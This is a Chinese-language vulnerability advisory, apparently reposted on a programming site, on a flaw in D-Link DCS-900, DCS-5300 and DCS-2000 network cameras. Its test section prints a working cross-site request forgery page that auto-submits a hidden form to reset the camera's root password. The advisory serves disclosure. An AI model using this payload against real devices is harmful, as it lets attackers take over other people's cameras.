发布日期:2012-02-23
更新日期:2012-02-24受影响系统:
D-Link DCS 900
D-Link DCS 5300
D-Link DCS 2000
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52134D-Link DCS-900、DCS-5300、DCS-2000是网络摄像机产品。D-Link DCS-900、DCS-5300、DCS-2000在实现上存在安全漏洞,可被利用导致在受影响设备上运行特权命令、更改信息、造成拒绝服务或注入任意脚本代码。<*来源:Rigan Iimrigan
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dlink.com/Bugzilla跨站请求伪造漏洞Csound getnum()多个缓冲区溢出漏洞相关资讯 D-Link
- 多个D-Link产品UPnP缓冲区溢出漏洞 (07/29/2015 13:27:45)
- D-Link DIR-601身份验证绕过漏洞 (05/05/2015 14:10:55)
- 多个D-Link产品HNAP命令远程权限提 (04/22/2015 16:56:15)
| - 多个D-Link产品HTTP缓冲区溢出漏洞 (07/29/2015 13:27:16)
- D-Link和趋势网络路由器发现远程执 (04/30/2015 07:44:07)
- D-Link DIR-645命令注入及栈缓冲区 (03/04/2015 06:55:27)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
-
|
易网时代-编程资源站